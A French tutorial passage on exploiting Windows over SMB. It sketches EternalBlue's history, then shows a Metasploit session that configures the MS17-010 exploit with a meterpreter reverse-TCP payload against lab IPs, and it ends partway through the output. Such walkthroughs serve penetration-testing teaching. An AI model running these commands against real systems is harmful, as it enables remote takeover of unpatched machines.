Sommaire

Exemple d’exploitation d’un Windows

1. SMB (445/TCP)

Quel que soit le système d’exploitation sous-jacent, SMB est un protocole de partage de fichiers en réseau pouvant écouter sur le port 139/TCP ou 445/TCP.

En 2017, le groupe de hackers The Shadow Brokers publiait un exploit affectant la version 1 du protocole SMB (SMBv1). Cet exploit, initialement développé par la NSA (National SecurityAgency), a entre autres permis au ransomware Wannacry d’avoir une ampleur aussi importante grâce à l’exploitation de la faille MS17-010. Comme toute vulnérabilité à l’heure actuelle, cette dernière dispose d’un joli nom : EternalBlue.

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(windows/smb/ms17_010_eternalblue) > set payload 
windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse_tcp 
 
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 172.16.86.134 
LHOST => 172.16.86.134 
 
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 172.16.86.110 
RHOST => 172.16.86.110 
 
msf exploit(windows/smb/ms17_010_eternalblue) > exploit 
 
[*] Started reverse TCP handler on 172.16.86.134:4444 
[*] 172.16.86.110:445 - Connecting to target for exploitation. 
[+] 172.16.86.110:445 - Connection established for exploitation. 
[+] 172.16.86.110:445 - Target OS selected valid for OS indicated by 
SMB reply  ...